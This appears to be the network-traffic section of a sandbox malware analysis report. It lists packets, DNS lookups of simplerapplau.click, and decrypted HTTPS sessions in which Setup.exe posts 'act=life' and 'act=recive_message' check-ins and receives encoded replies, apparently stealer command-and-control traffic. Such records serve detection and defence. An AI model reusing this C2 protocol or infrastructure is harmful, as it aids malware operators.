Dec 18, 2024 18:29:45.948328018 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:45.949368000 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.949790955 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:45.949805975 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:47.238744974 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:47.238820076 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:47.245054960 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:47.245064020 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:47.245294094 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:47.255634069 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:47.256772995 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:47.256824017 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:48.758301973 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:48.758543968 CET	443	49764	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:48.758590937 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:48.758619070 CET	49764	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:48.873852968 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:48.873895884 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:48.873995066 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:48.874351025 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:48.874366045 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:50.238475084 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:50.238595009 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:50.299211979 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:50.299237013 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:50.299576998 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:50.315773010 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:50.315907955 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:50.315947056 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:50.316009998 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:50.363326073 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:55.533662081 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:55.533785105 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:55.533859015 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:55.533953905 CET	49769	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:55.533971071 CET	443	49769	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:55.850528002 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:55.850625992 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:55.850723982 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:55.851018906 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:55.851061106 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:57.255645037 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:57.255717993 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:57.258505106 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:57.258516073 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:57.258795023 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:57.260027885 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:57.260169029 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:57.260194063 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:29:57.260284901 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:29:57.260293961 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:01.755976915 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:01.756084919 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:01.756160975 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:01.756360054 CET	49784	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:01.756381035 CET	443	49784	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:02.084142923 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:02.084223032 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:02.084332943 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:02.084678888 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:02.084709883 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:03.299531937 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:03.299618959 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:03.300872087 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:03.300888062 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:03.301134109 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:03.302505970 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:03.302578926 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:03.302589893 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:08.065228939 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:08.065500975 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:08.065516949 CET	443	49795	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:08.065572977 CET	49795	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:08.187824011 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:08.187868118 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:08.187967062 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:08.188416958 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:08.188433886 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:09.409693956 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:09.409773111 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:09.411710978 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:09.411717892 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:09.411947012 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:09.413630962 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:09.413844109 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:09.413851023 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:13.913721085 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:13.913958073 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:13.914071083 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:13.914303064 CET	49805	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:13.914320946 CET	443	49805	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:13.918821096 CET	49819	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:13.918859959 CET	443	49819	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:13.918941021 CET	49819	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:13.919241905 CET	49819	443	192.168.2.7	104.21.88.199
Dec 18, 2024 18:30:13.919258118 CET	443	49819	104.21.88.199	192.168.2.7
Dec 18, 2024 18:30:14.346117020 CET	49819	443	192.168.2.7	104.21.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 18:29:34.370351076 CET	51773	53	192.168.2.7	1.1.1.1
Dec 18, 2024 18:29:34.779788971 CET	53	51773	1.1.1.1	192.168.2.7
Dec 18, 2024 18:29:54.580832958 CET	61431	53	192.168.2.7	1.1.1.1
Dec 18, 2024 18:29:54.719834089 CET	53	61431	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 18:29:34.370351076 CET	192.168.2.7	1.1.1.1	0x86b2	Standard query (0)	simplerapplau.click	A (IP address)	IN (0x0001)	false
Dec 18, 2024 18:29:54.580832958 CET	192.168.2.7	1.1.1.1	0x96bf	Standard query (0)	simplerapplau.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 18:29:34.779788971 CET	1.1.1.1	192.168.2.7	0x86b2	No error (0)	simplerapplau.click	104.21.88.199	A (IP address)	IN (0x0001)	false
Dec 18, 2024 18:29:34.779788971 CET	1.1.1.1	192.168.2.7	0x86b2	No error (0)	simplerapplau.click	172.67.152.160	A (IP address)	IN (0x0001)	false
Dec 18, 2024 18:29:54.719834089 CET	1.1.1.1	192.168.2.7	0x96bf	No error (0)	simplerapplau.click	104.21.88.199	A (IP address)	IN (0x0001)	false
Dec 18, 2024 18:29:54.719834089 CET	1.1.1.1	192.168.2.7	0x96bf	No error (0)	simplerapplau.click	172.67.152.160	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

simplerapplau.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49738	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:29:36 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: simplerapplau.click
2024-12-18 17:29:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 17:29:39 UTC	1040	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:29:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6mrtln9mkfdige34nfnn7etilj; expires=Sun, 13-Apr-2025 11:16:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARCskgmKNNS9kzqunmSrv80ToCjNj1RwzA6ZuXAG2bkCwnwxjUMxFtog%2Fu01huM2ngipBsqF2vrinUPbr2GwofdKBSHoRqqYiX6gX%2FGu6S5WvfLfYsvUzVGARroY%2FDMr67SQODpp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e0442a84184d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19923&min_rtt=1660&rtt_var=11566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1759036&cwnd=238&unsent_bytes=0&cid=0329426d61329c84&ts=3707&x=0"
2024-12-18 17:29:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 17:29:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49749	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:29:41 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: simplerapplau.click
2024-12-18 17:29:41 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--VIKA&j=efdebde057a1df3f7c15b7f4da907c2d
2024-12-18 17:29:45 UTC	1035	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:29:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g56vjs6q04qfjvpad0qmjkqgjc; expires=Sun, 13-Apr-2025 11:16:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijJJrXEXw93FOCBiLt%2FQkIEeXRehhvZqEdYEVs2Px9wPKSCm3ae%2BC4as8sWXh6qtkDNdnrFvhkT8vyLYsfEvpXD4nRS4zZbnoY1CqMbCcuxzJlf0q90bZDQi07JGkC8BKdFrOmCz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e06429fc7d0c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2414&min_rtt=2414&rtt_var=1207&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=981&delivery_rate=192930&cwnd=156&unsent_bytes=0&cid=58f793640a6ab3d0&ts=4388&x=0"
2024-12-18 17:29:45 UTC	334	IN	Data Raw: 31 64 34 36 0d 0a 62 4d 6e 59 35 2b 73 57 4b 68 47 55 30 2b 79 75 61 37 6c 51 39 55 45 4b 38 5a 61 79 45 4e 64 31 56 32 5a 50 50 58 36 61 34 6c 41 58 36 36 37 46 30 53 49 47 4d 2b 65 32 7a 70 51 4e 32 44 79 47 4a 43 62 54 39 39 59 79 37 52 4d 32 43 6a 78 59 55 72 69 55 50 55 37 7a 76 6f 61 48 5a 55 38 39 74 72 61 55 6a 46 48 69 4b 39 63 6b 5a 4e 4f 73 6b 48 57 39 46 7a 59 4b 4c 56 77 56 39 5a 49 38 44 36 47 30 67 49 4e 7a 53 58 58 31 76 34 48 4c 44 74 77 78 6e 79 39 6a 6e 50 37 66 4d 76 74 58 4d 68 78 74 42 31 7a 58 68 79 51 4e 68 4c 6d 55 67 44 52 58 50 65 2f 78 69 63 42 4a 67 33 4b 55 4a 47 69 64 38 4e 5a 37 76 78 30 2f 41 69 78 5a 46 4f 71 4c 4e 67 53 68 75 6f 4f 43 65 55 42 68 2b 4c 57 47 77 41 6a 57 4d 64 64 74 4b 4a 54 73 6b 43 72 31 52 41 63 48 50 Data Ascii: 1d46bMnY5+sWKhGU0+yua7lQ9UEK8ZayENd1V2ZPPX6a4lAX667F0SIGM+e2zpQN2DyGJCbT99Yy7RM2CjxYUriUPU7zvoaHZU89traUjFHiK9ckZNOskHW9FzYKLVwV9ZI8D6G0gINzSXX1v4HLDtwxny9jnP7fMvtXMhxtB1zXhyQNhLmUgDRXPe/xicBJg3KUJGid8NZ7vx0/AixZFOqLNgShuoOCeUBh+LWGwAjWMddtKJTskCr1RAcHP
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 6f 52 6f 6b 52 44 49 52 42 62 69 48 50 6b 37 7a 2b 6f 4f 48 64 55 56 7a 35 4c 6d 46 78 77 7a 4a 4f 5a 34 75 5a 5a 50 35 32 6e 32 32 46 7a 49 4f 4a 31 41 57 2f 49 30 2f 43 4b 75 36 78 63 63 30 54 32 75 32 36 63 37 76 44 4d 73 31 6d 7a 55 71 71 62 54 50 50 4b 78 58 4d 67 68 74 42 31 7a 77 68 54 45 4e 6f 4c 57 47 67 58 39 61 63 2b 53 33 67 38 6b 62 33 54 65 5a 4b 57 75 42 2f 74 35 30 74 68 34 2b 44 53 68 59 47 4c 6a 4f 63 67 6d 7a 2b 74 33 4a 56 55 56 34 2b 72 75 5a 7a 45 6e 45 66 49 35 6a 62 35 2b 30 69 44 4b 78 46 6a 45 46 4b 56 45 53 2f 49 77 30 41 4b 61 31 67 34 4e 30 54 33 6e 2b 75 59 2f 42 41 74 51 79 6b 69 35 73 6c 66 6a 52 64 2f 56 5a 64 51 4d 31 48 30 53 34 72 6a 55 4e 75 66 69 77 69 6e 70 47 64 4f 44 78 6b 59 49 51 6d 7a 57 62 59 7a 44 54 2b 74 56 Data Ascii: oRokRDIRBbiHPk7z+oOHdUVz5LmFxwzJOZ4uZZP52n22FzIOJ1AW/I0/CKu6xcc0T2u26c7vDMs1mzUqqbTPPKxXMghtB1zwhTENoLWGgX9ac+S3g8kb3TeZKWuB/t50th4+DShYGLjOcgmz+t3JVUV4+ruZzEnEfI5jb5+0iDKxFjEFKVES/Iw0AKa1g4N0T3n+uY/BAtQyki5slfjRd/VZdQM1H0S4rjUNufiwinpGdODxkYIQmzWbYzDT+tV
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 30 51 71 52 31 79 67 77 41 4d 5a 6f 50 69 77 69 6e 70 47 64 4f 44 78 6b 59 49 51 6d 7a 57 62 59 7a 44 54 2b 64 68 33 73 42 67 30 44 69 4e 61 46 76 53 49 50 41 32 35 74 59 47 4a 65 45 42 35 2b 37 2b 4b 78 41 44 51 4f 5a 45 6a 61 5a 6d 30 6e 6a 4b 79 44 33 56 63 62 57 73 62 39 49 30 39 54 4a 36 35 69 34 64 7a 58 6a 50 70 2f 35 65 4d 44 74 64 79 7a 32 4e 6b 6d 76 54 62 65 4c 45 58 4d 67 6b 6f 58 42 76 37 6a 54 55 45 70 62 32 42 68 58 31 46 64 66 61 32 69 73 6b 62 33 6a 75 62 4c 79 6a 64 74 4e 64 71 39 55 39 31 4b 79 70 4a 48 39 65 44 49 77 66 72 70 63 75 51 4e 45 39 2f 74 75 6e 4f 79 77 7a 54 4f 5a 45 72 61 49 48 78 33 6e 6d 30 48 54 4d 46 49 46 4d 61 2b 49 45 79 43 4b 65 36 67 6f 35 6d 57 6e 62 77 6f 34 53 4d 52 35 73 31 6a 32 4d 77 30 38 4c 41 5a 61 51 42 Data Ascii: 0QqR1ygwAMZoPiwinpGdODxkYIQmzWbYzDT+dh3sBg0DiNaFvSIPA25tYGJeEB5+7+KxADQOZEjaZm0njKyD3VcbWsb9I09TJ65i4dzXjPp/5eMDtdyz2NkmvTbeLEXMgkoXBv7jTUEpb2BhX1Fdfa2iskb3jubLyjdtNdq9U91KypJH9eDIwfrpcuQNE9/tunOywzTOZEraIHx3nm0HTMFIFMa+IEyCKe6go5mWnbwo4SMR5s1j2Mw08LAZaQB
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 41 55 38 49 38 39 43 71 57 38 67 34 52 78 52 33 6e 6b 75 59 44 42 41 74 51 35 68 53 4e 6c 6c 2f 6a 55 65 72 34 64 64 55 70 74 57 41 53 34 32 48 49 37 70 72 57 46 69 6d 49 49 62 4c 69 6f 7a 73 73 46 6d 32 72 58 4c 32 61 54 2b 39 78 2b 76 68 38 30 43 43 4e 59 47 66 47 49 4f 68 79 71 76 6f 32 49 65 6b 64 79 38 72 53 4c 79 41 37 66 4e 4a 68 6a 4a 74 50 7a 79 44 4c 74 56 78 6f 6a 47 42 30 39 77 73 41 74 51 4c 4c 36 67 6f 55 30 45 44 50 36 73 6f 4c 45 42 74 30 37 6d 79 6c 68 6d 50 6a 62 64 72 6b 65 4d 41 49 73 57 68 6e 35 68 44 34 45 72 62 6d 47 68 6e 74 48 65 37 62 2f 7a 73 73 52 6d 32 72 58 42 6e 2b 59 2b 74 59 79 71 6c 6b 73 52 43 70 54 58 4b 44 41 50 67 65 74 76 49 43 46 64 55 35 37 38 37 6d 4b 7a 51 2f 64 4d 5a 67 6e 62 5a 4c 37 31 48 36 37 48 54 51 46 49 Data Ascii: AU8I89CqW8g4RxR3nkuYDBAtQ5hSNll/jUer4ddUptWAS42HI7prWFimIIbLiozssFm2rXL2aT+9x+vh80CCNYGfGIOhyqvo2Iekdy8rSLyA7fNJhjJtPzyDLtVxojGB09wsAtQLL6goU0EDP6soLEBt07mylhmPjbdrkeMAIsWhn5hD4ErbmGhntHe7b/zssRm2rXBn+Y+tYyqlksRCpTXKDAPgetvICFdU5787mKzQ/dMZgnbZL71H67HTQFI
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 48 50 51 71 73 74 6f 4f 47 63 6b 6c 32 2f 4c 32 4a 79 51 4c 55 50 74 64 74 4b 4a 54 73 6b 43 72 31 4f 54 34 58 4f 6c 77 53 38 35 59 70 54 72 54 30 6e 4d 6c 7a 52 44 4f 75 38 59 33 48 41 74 38 79 6d 79 4e 73 6e 76 54 43 66 62 49 51 50 41 38 2f 56 52 76 2f 69 7a 6f 46 70 4c 79 58 68 58 70 61 64 75 53 6a 7a 6f 4a 4a 33 43 72 58 65 79 69 6c 38 38 42 69 74 6c 55 45 45 69 35 4a 46 2f 57 4d 63 68 48 6c 6f 38 57 4f 65 41 67 72 74 72 65 42 78 51 72 55 4d 35 34 76 5a 5a 62 39 31 58 4f 7a 45 7a 38 4f 4c 56 6b 61 2b 59 55 34 44 61 71 77 6a 49 35 38 54 33 44 6b 38 63 43 4d 44 73 4e 79 7a 32 4e 42 6c 4f 62 65 59 76 55 49 65 78 31 74 57 42 43 34 32 48 49 4b 6f 62 57 42 6a 6e 68 4f 64 76 43 38 6a 38 4d 49 32 7a 32 54 4b 47 47 56 39 64 31 33 75 42 4d 6e 44 69 5a 51 45 50 Data Ascii: HPQqstoOGckl2/L2JyQLUPtdtKJTskCr1OT4XOlwS85YpTrT0nMlzRDOu8Y3HAt8ymyNsnvTCfbIQPA8/VRv/izoFpLyXhXpaduSjzoJJ3CrXeyil88BitlUEEi5JF/WMchHlo8WOeAgrtreBxQrUM54vZZb91XOzEz8OLVka+YU4DaqwjI58T3Dk8cCMDsNyz2NBlObeYvUIex1tWBC42HIKobWBjnhOdvC8j8MI2z2TKGGV9d13uBMnDiZQEP
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 72 72 43 49 69 6e 74 4c 59 66 65 33 6e 4d 77 45 30 53 43 64 4b 47 32 65 2b 64 31 78 73 78 45 2b 43 44 39 57 48 50 75 4c 63 6b 44 72 76 5a 33 4a 4c 41 68 51 34 61 65 45 79 77 58 4e 4f 5a 59 67 66 70 37 6b 6b 44 7a 31 42 6a 49 56 62 51 63 4b 36 4a 63 31 45 65 57 6a 78 59 35 34 43 43 75 32 74 34 66 4b 44 74 30 38 68 53 5a 75 6e 50 76 5a 65 37 45 66 4e 67 51 70 57 78 76 39 67 7a 34 46 72 4c 6d 4b 6a 58 31 47 65 76 6e 78 77 49 77 4f 77 33 4c 50 59 30 6d 49 39 39 78 2f 39 51 68 37 48 57 31 59 45 4c 6a 59 63 67 4b 6c 76 34 57 44 63 6b 78 32 38 4c 75 4c 7a 41 4c 59 50 5a 4d 6c 62 4a 7a 30 32 33 75 30 45 54 41 4f 4a 6c 6b 52 2b 34 59 30 54 75 58 36 67 70 45 30 45 44 50 57 71 6f 50 41 44 70 73 74 32 54 6f 6f 6c 50 69 51 4b 76 55 63 4f 51 41 71 58 78 48 37 69 44 63 Data Ascii: rrCIintLYfe3nMwE0SCdKG2e+d1xsxE+CD9WHPuLckDrvZ3JLAhQ4aeEywXNOZYgfp7kkDz1BjIVbQcK6Jc1EeWjxY54CCu2t4fKDt08hSZunPvZe7EfNgQpWxv9gz4FrLmKjX1GevnxwIwOw3LPY0mI99x/9Qh7HW1YELjYcgKlv4WDckx28LuLzALYPZMlbJz023u0ETAOJlkR+4Y0TuX6gpE0EDPWqoPADpst2ToolPiQKvUcOQAqXxH7iDc
2024-12-18 17:29:45 UTC	323	IN	Data Raw: 4a 39 35 57 48 53 32 6a 73 43 4d 45 5a 74 71 31 78 5a 72 6e 66 72 58 5a 4b 52 61 45 68 49 6e 57 41 7a 2f 6c 7a 31 4f 35 66 71 44 79 53 77 62 50 62 61 31 6e 34 78 52 69 32 44 4d 64 6a 76 45 70 49 4a 74 2b 77 35 31 45 6d 30 48 54 72 62 41 49 45 37 7a 2b 73 4b 4b 5a 6c 70 31 39 61 65 4e 69 7a 66 6c 46 59 30 75 62 6f 54 6c 37 6b 79 79 44 54 67 43 4f 6b 35 51 37 59 4d 38 41 4b 79 73 78 63 63 30 52 7a 4f 75 69 4d 36 45 53 65 52 38 31 7a 73 6f 79 37 54 6c 63 62 73 5a 4d 68 49 38 45 6a 76 69 6a 54 51 5a 75 76 72 4c 79 58 49 49 4b 36 62 2f 7a 73 67 59 6d 32 72 48 63 54 50 47 70 34 63 69 35 77 68 37 48 57 31 4a 58 4b 44 53 66 45 36 35 2b 74 33 4a 4d 30 74 68 35 4c 65 4e 32 67 71 63 44 4b 6b 4e 62 35 58 78 31 32 4c 33 4f 54 34 51 4b 68 39 53 75 49 39 79 56 70 4c 36 Data Ascii: J95WHS2jsCMEZtq1xZrnfrXZKRaEhInWAz/lz1O5fqDySwbPba1n4xRi2DMdjvEpIJt+w51Em0HTrbAIE7z+sKKZlp19aeNizflFY0uboTl7kyyDTgCOk5Q7YM8AKysxcc0RzOuiM6ESeR81zsoy7TlcbsZMhI8EjvijTQZuvrLyXIIK6b/zsgYm2rHcTPGp4ci5wh7HW1JXKDSfE65+t3JM0th5LeN2gqcDKkNb5Xx12L3OT4QKh9SuI9yVpL6
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 31 64 34 32 0d 0a 38 38 72 46 63 6a 52 48 55 4e 55 72 69 53 63 6c 62 72 2f 59 61 62 5a 6b 35 77 34 4c 4c 4a 38 6a 66 59 4a 4a 6f 73 59 35 4c 4b 37 6c 79 34 46 6a 59 4b 62 32 34 4b 39 5a 41 78 43 36 79 45 75 34 64 7a 58 48 54 34 74 34 36 4d 52 35 73 39 31 33 74 52 30 37 79 51 54 66 74 58 4c 55 52 31 48 79 6e 37 6a 6a 77 4a 76 61 76 49 71 6d 4a 46 66 50 32 77 7a 6f 4a 4a 33 58 4c 50 63 79 62 54 38 4d 45 79 37 55 64 6e 58 33 67 4d 53 36 6a 53 4c 55 43 79 2b 70 50 4a 4c 42 6f 39 74 71 50 4f 6c 45 6d 63 50 4a 6f 69 61 35 33 33 77 6d 43 7a 46 43 4d 48 61 6d 45 69 32 59 30 35 41 71 61 31 6a 72 64 4b 61 58 37 39 76 59 50 44 41 75 55 4d 67 69 42 6d 6e 66 50 47 59 2f 56 5a 64 51 74 74 42 79 57 34 79 48 49 78 35 66 71 64 79 53 77 49 52 76 57 2f 67 4d 73 66 79 6e 2b Data Ascii: 1d4288rFcjRHUNUriSclbr/YabZk5w4LLJ8jfYJJosY5LK7ly4FjYKb24K9ZAxC6yEu4dzXHT4t46MR5s913tR07yQTftXLUR1Hyn7jjwJvavIqmJFfP2wzoJJ3XLPcybT8MEy7UdnX3gMS6jSLUCy+pPJLBo9tqPOlEmcPJoia533wmCzFCMHamEi2Y05Aqa1jrdKaX79vYPDAuUMgiBmnfPGY/VZdQttByW4yHIx5fqdySwIRvW/gMsfyn+
2024-12-18 17:29:45 UTC	1369	IN	Data Raw: 62 53 49 4d 76 49 55 4a 78 59 72 58 41 72 37 78 77 77 77 6a 71 32 47 6d 58 4a 4c 54 63 69 61 67 73 6f 4f 77 54 57 52 42 55 6a 54 75 70 42 39 39 55 38 4d 52 47 55 66 49 37 62 41 4b 6b 37 7a 2b 72 43 4b 65 6b 5a 30 34 4b 44 44 36 52 37 59 49 70 45 67 4b 4e 32 30 31 6a 4c 74 52 33 74 45 4b 55 35 63 6f 4e 42 67 56 66 37 70 30 74 6b 6d 56 7a 33 76 38 5a 69 4d 55 59 6c 38 31 7a 45 6f 79 37 53 58 63 61 63 46 4d 77 63 37 58 46 76 47 76 68 51 4e 75 72 43 6b 68 47 52 50 54 63 69 6b 6a 63 49 48 33 43 53 47 59 79 62 54 2b 35 41 71 6a 46 64 39 53 43 74 63 43 72 69 2f 66 45 36 7a 2b 74 33 4a 51 55 74 39 2b 4c 61 59 33 55 54 39 4d 59 59 70 53 5a 37 6b 31 7a 4c 37 56 7a 4e 45 64 51 78 53 75 49 51 6a 54 76 50 71 31 39 49 68 47 79 53 6d 34 35 47 43 45 4a 73 6b 31 33 73 36 Data Ascii: 